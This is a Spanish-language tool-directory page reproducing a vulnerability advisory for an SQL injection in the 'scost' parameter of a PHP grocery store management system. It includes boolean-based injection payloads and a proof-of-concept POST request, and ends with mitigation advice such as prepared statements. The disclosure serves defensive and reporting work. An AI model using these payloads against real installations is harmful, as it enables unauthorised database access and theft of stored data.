Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/pateldhyeyit/cve-2026-37149
Análisis de VulnerabilidadesExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - Vulnerabilidad de inyección SQL en el parámetro scost de search_products.php en GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.

Ver Repositorio
22hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-37149

Inyección SQL en GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0

Resumen

CVE ID: CVE-2026-37149 Tipo de vulnerabilidad: Inyección SQL (CWE-89) Gravedad: Alta Descubridor: Dhyey Patel

Descripción

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contiene una vulnerabilidad de inyección SQL en el parámetro "scost" de "/grocery/search_products.php".

La aplicación no valida correctamente la entrada proporcionada por el usuario antes de incorporarla a las consultas SQL. Un atacante puede inyectar expresiones SQL manipuladas a través del parámetro vulnerable y manipular las consultas de la base de datos subyacente.

Una explotación exitosa puede permitir el acceso no autorizado a información sensible de la base de datos y la ejecución de sentencias SQL arbitrarias.

Producto Afectado

Producto: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN Versión: v1.0 Repositorio del proveedor:

https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

Componente Afectado

  • "/grocery/search_products.php"
  • Parámetro POST: "scost"

Tipo de Ataque

Remoto

Información del Proveedor

Proyecto de código abierto mantenido por el propietario del repositorio: https://github.com/anirudhkannanvp

Detalles Técnicos

La vulnerabilidad se confirmó mediante técnicas de inyección SQL basadas en booleanos.

Payload de condición TRUE

-1 OR 321=6 AND 000483=000483 --

Payload de condición FALSE

-1 OR 320=6 AND 000483=000483 --

Las respuestas de la aplicación diferían según si la condición inyectada se evaluaba como TRUE o FALSE, lo que confirma la inyección SQL.

Pruebas adicionales confirmaron la ejecución exitosa de funciones SQL, incluyendo:

SELECT database()

El nombre de la base de datos devuelto fue:

grocery

Esto demuestra que se pueden ejecutar consultas SQL arbitrarias a través del parámetro vulnerable.

Prueba de Concepto

Solicitud

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

Resultado

La respuesta cambia según la condición booleana inyectada, lo que confirma la inyección SQL en el parámetro "scost".

Impacto

Los impactos potenciales incluyen:

  • Enumeración de bases de datos
  • Divulgación de información sensible
  • Omisión de autenticación
  • Extracción de datos
  • Modificación de registros de la base de datos

Mitigación

Los desarrolladores deberían:

  1. Usar sentencias preparadas.
  2. Usar consultas SQL parametrizadas.
  3. Validar los parámetros de entrada numéricos.
  4. Implementar validación de entrada en el lado del servidor.
  5. Evitar la concatenación directa de entrada controlada por el usuario en sentencias SQL.

Referencias

OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection

MITRE CVE Program https://www.cve.org

Créditos

Descubierto y reportado por: Dhyey Patel

Descargar herramienta